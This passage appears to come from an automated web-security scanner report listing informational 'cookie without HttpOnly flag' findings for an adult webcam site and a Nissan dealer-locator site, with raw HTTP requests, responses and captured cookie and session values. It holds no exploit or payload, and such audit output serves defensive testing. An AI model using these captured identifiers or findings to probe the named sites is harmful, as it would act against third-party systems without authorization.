imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:27 GMT
Connection: close
Content-Length: 9835
Vary: Accept-Encoding



<html>
   <head>
       <title>Public Relations of ImLive Video Chat</title>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com
...[SNIP]...

11.379. http://imlive.com/preparesearch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/preparesearch.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.380. http://imlive.com/sex_webcams_index/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/sex_webcams_index/index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sex_webcams_index/index.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:00 GMT
Connection: close
Content-Length: 23768
Vary: Accept-Encoding

<html>
   <head>
       <title>
           Live Sex Chat Categories at ImLive
       </title>
       <meta name="description" content="Live sex chat with girls, lesbians, gays, couples, threesomes and fetish lovers. CO
...[SNIP]...

11.381. http://imlive.com/sitemap.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/sitemap.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:00 GMT
Connection: close
Content-Length: 33732
Vary: Accept-Encoding

<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...

11.382. http://imlive.com/videosfr.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/videosfr.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:21 GMT
Connection: close
Content-Length: 15706
Vary: Accept-Encoding

<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...

11.383. http://imlive.com/warningms.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/warningms.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:28 GMT
Connection: close
Content-Length: 14418
Vary: Accept-Encoding

<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...

11.384. http://imlive.com/webcam-advanced-search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-advanced-search/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.385. http://imlive.com/webcam-faq/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-faq/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.386. http://imlive.com/webcam-login/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-login/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.387. http://imlive.com/webcam-sign-up/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-sign-up/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.388. http://imlive.com/wmaster.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/wmaster.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 13:59:07 GMT; path=/
imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; path=/
prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; expires=Mon, 14-Mar-2011 13:59:07 GMT; path=/
BIGipServerImlive=2434008642.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: homepagems3.asp
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; path=/; HttpOnly
Set-Cookie: spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 13:59:07 GMT; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; path=/
Set-Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; expires=Mon, 14-Mar-2011 13:59:07 GMT; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 13:59:06 GMT
Content-Length: 0
Set-Cookie: BIGipServerImlive=2434008642.20480.0000; path=/

11.389. http://in.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://in.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=4fbca91b-ec62-43d7-a59a-b2e914467e3f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:35 GMT; path=/
iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.390. http://in.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://in.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=01af6778-d1d3-49a7-be76-9ec11b8e59e1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:44 GMT; path=/
iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pin=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:24:44 GMT; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=j0cmfjeqkgfyt5q0kkvpbq55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=j0cmfjeqkgfyt5q0kkvpbq55; path=/; HttpOnly
Set-Cookie: spvdr=vd=01af6778-d1d3-49a7-be76-9ec11b8e59e1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:44 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pin=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:24:44 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:44 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

11.391. http://it.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=d3cc5bc2-bab2-416e-acff-891f674e66d4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:49 GMT; path=/
iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.392. http://it.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=77d53362-f25f-48ea-b547-91e4ba6466fb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:53 GMT; path=/
iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pit=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:24:53 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=leuwhx55i4ysao55e3howj45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=leuwhx55i4ysao55e3howj45; path=/; HttpOnly
Set-Cookie: spvdr=vd=77d53362-f25f-48ea-b547-91e4ba6466fb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:53 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pit=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:24:53 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:53 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.393. http://jp.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jp.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=eb9d52f6-9629-4754-bdff-f15e37967440&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:02 GMT; path=/
ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.394. http://jp.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jp.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=274f15f2-3053-46a8-b600-2288a0c564c6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:05 GMT; path=/
ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pjp=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:05 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dv01ap55xfvfsu45pneewj55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dv01ap55xfvfsu45pneewj55; path=/; HttpOnly
Set-Cookie: spvdr=vd=274f15f2-3053-46a8-b600-2288a0c564c6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:05 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pjp=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:05 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:04 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.395. http://local.nissanusa.com/albany-schenectady-troy-ny-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/albany-schenectady-troy-ny-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=12201; expires=Sat, 05-Feb-2011 04:53:18 GMT; path=/
localDMA=albany-schenectady-troy-ny-area; expires=Sat, 05-Feb-2011 04:53:18 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /albany-schenectady-troy-ny-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.396. http://local.nissanusa.com/albuquerque-santa-fe-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/albuquerque-santa-fe-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=87101; expires=Sat, 05-Feb-2011 04:57:37 GMT; path=/
localDMA=albuquerque-santa-fe-area; expires=Sat, 05-Feb-2011 04:57:37 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /albuquerque-santa-fe-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.397. http://local.nissanusa.com/atlanta-area previous next

Summary

Severity:	Information
